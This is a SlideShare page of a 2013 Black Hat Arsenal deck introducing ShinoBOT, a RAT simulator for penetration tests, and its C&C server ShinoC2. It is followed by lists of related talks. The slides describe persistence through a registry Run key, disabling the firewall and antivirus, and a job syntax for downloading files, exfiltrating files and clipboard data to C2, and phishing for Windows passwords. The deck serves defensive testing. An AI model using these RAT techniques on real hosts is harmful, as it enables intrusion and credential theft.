SlideShare a Scribd company logo

Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)

Download as PPTX, PDF
Shota Shinogi
Shota Shinogi

Introduction of ShinoBOT, the BOT/RAT simulator.

Technology
1 of 14
ShinoBOT ShinoC2 Can you prevent APT like me? - the pentest tool to measure the defense against APT/RAT - Author: Shota Shinogi 1
>whoami Name: Shota Shinogi pronounce: ʃota ʃinogi @sh1n0g1 work in the Security Research Center of Macnica Networks Corp., Japan. my carrier of security 2 HDD Encryption (SafeBoot) 2004 2007 Personal Firewall (Sygate) 2009 Host DLP (McAfee Host DLP) 2010 Network IPS (McAfee NSP) 2011 Web App Firewall (Citrix Netscaler) I’m here 2013 a Japanese disty of security products Security Researcher (not product oriented)
>strings ShinoBOT.exe BOT or RAT(Remote Administration Tool) Simulator for pentest. It connects to ShinoC2; the C&C server, every 10 sec. If it get any jobs, it does it immediately. Supported Platform Windows XP/Vista/7 ( + .net framework ≥ 2.x) Mayby Windows 8, not fully tested yet… Acts like a malware Before doing the job received from ShinoC2, it acts a little bit like a malware. Copy itself in the user home directory C:Users%user%ShinoBOT.exe Add the registry (to start everytime on booting). HKCUSoftwareMicrosoftWindowsCurrent VersionRun Disable Windows Firewall Stop Windows Update service Stop the service of McAfee, Symantec Antivirus 3
>more ShinoBOT.exe Features C&C as a service you don’t need to build your C&C server. Easy to go. Password Protection only the guy which know the password can control your host Job Sharing you share your nice hacking command for everyone and use the command other people created. Work through proxy As the channel is HTTP(S), it can work with the proxy 4
>whois ShinoC2 ShinoC2 is the Command & Control server for ShinoBOT. You (red team) can create a job and send it to your ShinoBOT-affected devices. It has a web GUI so you can manipulate by your favorite browser, smart device, etc. 5 ShinoBOT ShinoC2Access/Send Results Command
>more purpose_of_ShinoBOT_ShinoC2.txt The steps before “Install” of Kill Chain… called PRE- COMPROMISED phase (search “Cyber Kill Chain” from Lockheed Martin if you are not familiar) It is very difficult to prevent those steps perfectly. So we have to consider how to prevent the following step… 6 Phase Attacker’s Activity How to prevent Recon • Social Engineering • Collectiong info from SNS, press release… • more and more • User Education how about fool users(sigh) Weaponization • Using Packer • XOR Crypt • etc for evade AV/IPS • IPS/AV efficient only for the known binaries Delivery • Send by email • Drive By Download • Gateway Antivirus • Web Filter efficient only for the known bad ip/domain/bin Exploit • Attack the vulnerabililty of IE,Adobe,Java, etc. • Patches, patches, patches… how about the zero day attacks??
>tail purpose_of_ShinoBOT_ShinoC2.txt The following steps called POST-COMPROMISED which covered by ShinoBOT You can use ShinoBOT/ShinoC2 to test your environment to know what’s happen after the success of zero day attacks. does your security gear can detect it ? if yes, what kind of logs you can see ? 7 Phase Attacker’s Activity Coverage Install • Install RAT ShinoBOTC&C • Connect to C&C Actions on Objective • Critical data exfiltration
>man ShinoBOT How to setup 一. Download ShinoBOT 二. Run ShinoBOT 三. That’s all. How to use 一. Access to ShinoC2 二. Click the [HOST] link. Your host will be there. 三. Click [Assign Job] 四. Select the job you want to run on your host. (you can also create your job, see the slide “man ShinoC2:job”) 五. Enter the password provided from the GUI of ShinoBOT 六. Press [Assign] button. 七. Wait 10 seconds. 八. You job will be done. 8
>./shinobot.exe Demonstration 9 百聞は一見にしかず Seeing is believing
>SBOTshot:ShinoBOT GUI 10 • It has a GUI ? Yes, ShinoBOT is not a tool for the bad people. So I made ShinoBOT not to become silent. This is also the reason why you need the password to send the job.
>SBOTshot:ShinoC2 11
>man ShinoC2 job page1 You can create your own job by the job menu 12
>man ShinoC2 job page2 The “command” will be redirected to cmd.exe except those special commands. 13 Commands Notes Examples SBOTshot Take a screen shot SBOTshot SBOTwget Download a file SBOTwget:http://www.xxx/aaa.exe SBOTfget Upload the local file to C2 SBOTfget:C:boot.ini SBOTrunA Run a process asynchronous *it means ShinoBOT will not wait until the process end. SBOTrunA:notepad.exe SBOTmbox Show a message box SBOTmbox:hello there SBOTibox Show an input box ( you can ask something to the user ) SBOTibox:input your windows password SBOTexit Kill ShinoBOT SBOTexit SBOTclpb Get the data from clibboard SBOTclpb *All command are case sensitive.
>vim Roadmap Coming soon… Take a snapshot from the webcam. Encrypt the C&C channel, not using SSL. Encrypt strings in the binary. Hide itselft by a kernel driver. (become a root-kit) 14

Recommended

ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel ExploitationzeroSteiner
 
Exploitation and State Machines
Exploitation and State MachinesExploitation and State Machines
Exploitation and State MachinesMichael Scovetta
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Luis Grangeia
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 

Recommended

ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel ExploitationzeroSteiner
 
Exploitation and State Machines
Exploitation and State MachinesExploitation and State Machines
Exploitation and State MachinesMichael Scovetta
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Luis Grangeia
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with DroidsPeter Hlavaty
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco GrassiShakacon
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
Injection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesInjection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesenSilo
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CanSecWest
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Luis Grangeia
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecPacSecJP
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jarsPacSecJP
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Android Attacks
Android AttacksAndroid Attacks
Android AttacksMichael Scovetta
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenTamas K Lengyel
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patternsPeter Hlavaty
 
Pentesting iPhone applications
Pentesting iPhone applicationsPentesting iPhone applications
Pentesting iPhone applicationsSatish b
 
Attacking and Defending Apple iOS Devices
Attacking and Defending Apple iOS DevicesAttacking and Defending Apple iOS Devices
Attacking and Defending Apple iOS DevicesTom Eston
 

More Related Content

What's hot

Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco GrassiShakacon
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
Injection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesInjection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesenSilo
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CanSecWest
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Luis Grangeia
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecPacSecJP
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jarsPacSecJP
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenTamas K Lengyel
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patternsPeter Hlavaty
 

What's hot (20)

Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
 
Injection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesInjection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniques
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardware
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsec
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jars
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Android Attacks
Android AttacksAndroid Attacks
Android Attacks
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradication
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with Xen
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patterns
 

Viewers also liked

Pentesting iPhone applications
Pentesting iPhone applicationsPentesting iPhone applications
Pentesting iPhone applicationsSatish b
 
Attacking and Defending Apple iOS Devices
Attacking and Defending Apple iOS DevicesAttacking and Defending Apple iOS Devices
Attacking and Defending Apple iOS DevicesTom Eston
 
Proform 505 cst Treadmill Buying Guide
Proform 505 cst Treadmill Buying GuideProform 505 cst Treadmill Buying Guide
Proform 505 cst Treadmill Buying GuideSharon Hamlin
 
Affiliate marketing - Nevyužitý marketingový kanál
Affiliate marketing - Nevyužitý marketingový kanálAffiliate marketing - Nevyužitý marketingový kanál
Affiliate marketing - Nevyužitý marketingový kanálMário Roženský
 
Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)
Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)
Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)Chinta Rama Krishna Rao
 
Tutorial for the ReportLinker App
Tutorial for the ReportLinker AppTutorial for the ReportLinker App
Tutorial for the ReportLinker AppReportLinker.com
 
Zoekwoordenselectie
ZoekwoordenselectieZoekwoordenselectie
ZoekwoordenselectieFrank Krepel
 
Afstuderen eindverslag final
Afstuderen eindverslag finalAfstuderen eindverslag final
Afstuderen eindverslag finalhanskanns
 
Aula 2 Concordância
Aula 2 ConcordânciaAula 2 Concordância
Aula 2 Concordância2º ano CSR
 
Personal Branding & You-How to use social Media to create tour own person...
Personal Branding & You-How to use social Media to create tour own person...Personal Branding & You-How to use social Media to create tour own person...
Personal Branding & You-How to use social Media to create tour own person...David Wesson
 
Nettet som en del av mediemiksen - Google Think 2014 - Espen Grimmert
Nettet som en del av mediemiksen - Google Think 2014 - Espen GrimmertNettet som en del av mediemiksen - Google Think 2014 - Espen Grimmert
Nettet som en del av mediemiksen - Google Think 2014 - Espen GrimmertEspen Grimmert
 
Constitution of bangladesh
Constitution of bangladeshConstitution of bangladesh
Constitution of bangladeshMd Mominul Islam
 
SEO Esettanulmány: optimalizált tartalommarketing
SEO Esettanulmány: optimalizált tartalommarketingSEO Esettanulmány: optimalizált tartalommarketing
SEO Esettanulmány: optimalizált tartalommarketingGabor Papp
 
Latvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojums
Latvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojumsLatvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojums
Latvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojumsPārresoru kordinācijas centrs (PKC)
 
Letter s presentatie
Letter s presentatieLetter s presentatie
Letter s presentatiecmagarry
 

Viewers also liked (20)

Pentesting iPhone applications
Pentesting iPhone applicationsPentesting iPhone applications
Pentesting iPhone applications
 
Attacking and Defending Apple iOS Devices
Attacking and Defending Apple iOS DevicesAttacking and Defending Apple iOS Devices
Attacking and Defending Apple iOS Devices
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Proform 505 cst Treadmill Buying Guide
Proform 505 cst Treadmill Buying GuideProform 505 cst Treadmill Buying Guide
Proform 505 cst Treadmill Buying Guide
 
Affiliate marketing - Nevyužitý marketingový kanál
Affiliate marketing - Nevyužitý marketingový kanálAffiliate marketing - Nevyužitý marketingový kanál
Affiliate marketing - Nevyužitý marketingový kanál
 
Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)
Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)
Baala bhaavana (neethi satakamu) బాల భావన ( నీతి శతకము.)
 
تقرير حول انتهاكات السجون في مصر
تقرير حول انتهاكات السجون في مصر تقرير حول انتهاكات السجون في مصر
تقرير حول انتهاكات السجون في مصر
 
Tutorial for the ReportLinker App
Tutorial for the ReportLinker AppTutorial for the ReportLinker App
Tutorial for the ReportLinker App
 
Zoekwoordenselectie
ZoekwoordenselectieZoekwoordenselectie
Zoekwoordenselectie
 
Afstuderen eindverslag final
Afstuderen eindverslag finalAfstuderen eindverslag final
Afstuderen eindverslag final
 
Aula 2 Concordância
Aula 2 ConcordânciaAula 2 Concordância
Aula 2 Concordância
 
Escritura creativa
Escritura creativaEscritura creativa
Escritura creativa
 
Personal Branding & You-How to use social Media to create tour own person...
Personal Branding & You-How to use social Media to create tour own person...Personal Branding & You-How to use social Media to create tour own person...
Personal Branding & You-How to use social Media to create tour own person...
 
Nettet som en del av mediemiksen - Google Think 2014 - Espen Grimmert
Nettet som en del av mediemiksen - Google Think 2014 - Espen GrimmertNettet som en del av mediemiksen - Google Think 2014 - Espen Grimmert
Nettet som en del av mediemiksen - Google Think 2014 - Espen Grimmert
 
Constitution of bangladesh
Constitution of bangladeshConstitution of bangladesh
Constitution of bangladesh
 
SEO Esettanulmány: optimalizált tartalommarketing
SEO Esettanulmány: optimalizált tartalommarketingSEO Esettanulmány: optimalizált tartalommarketing
SEO Esettanulmány: optimalizált tartalommarketing
 
Digital Marketing
Digital MarketingDigital Marketing
Digital Marketing
 
Ta mnimeiaeinaigiromas167
Ta mnimeiaeinaigiromas167Ta mnimeiaeinaigiromas167
Ta mnimeiaeinaigiromas167
 
Latvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojums
Latvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojumsLatvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojums
Latvija 2030, NAP2020 un deklarācijas īstenošanas uzraudzības ziņojums
 
Letter s presentatie
Letter s presentatieLetter s presentatie
Letter s presentatie
 

Similar to Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)

Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
Allegory of the cave(1)
Allegory of the cave(1)Allegory of the cave(1)
Allegory of the cave(1)setuid0
 
Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]
Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]
Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]OpenSlidesArchive
 
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Nick Galbreath
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software developmentNick Galbreath
 
Debugging a .NET program after crash (Post-mortem debugging)
Debugging a .NET program after crash (Post-mortem debugging)Debugging a .NET program after crash (Post-mortem debugging)
Debugging a .NET program after crash (Post-mortem debugging)Mirco Vanini
 
Encode x ICH: Intro to Building on the IC in Motoko
Encode x ICH: Intro to Building on the IC in MotokoEncode x ICH: Intro to Building on the IC in Motoko
Encode x ICH: Intro to Building on the IC in MotokoKlaraOrban
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 
Derby con 2014
Derby con 2014Derby con 2014
Derby con 2014TonikJDK
 
C# Production Debugging Made Easy
C# Production Debugging Made Easy C# Production Debugging Made Easy
C# Production Debugging Made EasyAlon Fliess
 
Cucumber meets iPhone
Cucumber meets iPhoneCucumber meets iPhone
Cucumber meets iPhoneErin Dees
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerJoxean Koret
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Juniper Networks
 
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)FFRI, Inc.
 
Building your own RC Car with Raspberry Pi
Building your own RC Car with Raspberry PiBuilding your own RC Car with Raspberry Pi
Building your own RC Car with Raspberry PiJeff Prestes
 
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...CODE BLUE
 
Pwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit GiriPwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit GiriOWASP Delhi
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdfdino715195
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 

Similar to Introduction of ShinoBOT (Black Hat USA 2013 Arsenal) (20)

Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
Allegory of the cave(1)
Allegory of the cave(1)Allegory of the cave(1)
Allegory of the cave(1)
 
Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]
Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]
Olivier Cleynen: Overtaking Proprietary Software Without Writing Code [24c3]
 
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software development
 
Debugging a .NET program after crash (Post-mortem debugging)
Debugging a .NET program after crash (Post-mortem debugging)Debugging a .NET program after crash (Post-mortem debugging)
Debugging a .NET program after crash (Post-mortem debugging)
 
Encode x ICH: Intro to Building on the IC in Motoko
Encode x ICH: Intro to Building on the IC in MotokoEncode x ICH: Intro to Building on the IC in Motoko
Encode x ICH: Intro to Building on the IC in Motoko
 
12 tricks to avoid hackers breaks your CI / CD
12 tricks to avoid hackers breaks your CI / CD12 tricks to avoid hackers breaks your CI / CD
12 tricks to avoid hackers breaks your CI / CD
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detection
 
Derby con 2014
Derby con 2014Derby con 2014
Derby con 2014
 
C# Production Debugging Made Easy
C# Production Debugging Made Easy C# Production Debugging Made Easy
C# Production Debugging Made Easy
 
Cucumber meets iPhone
Cucumber meets iPhoneCucumber meets iPhone
Cucumber meets iPhone
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
 
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
 
Building your own RC Car with Raspberry Pi
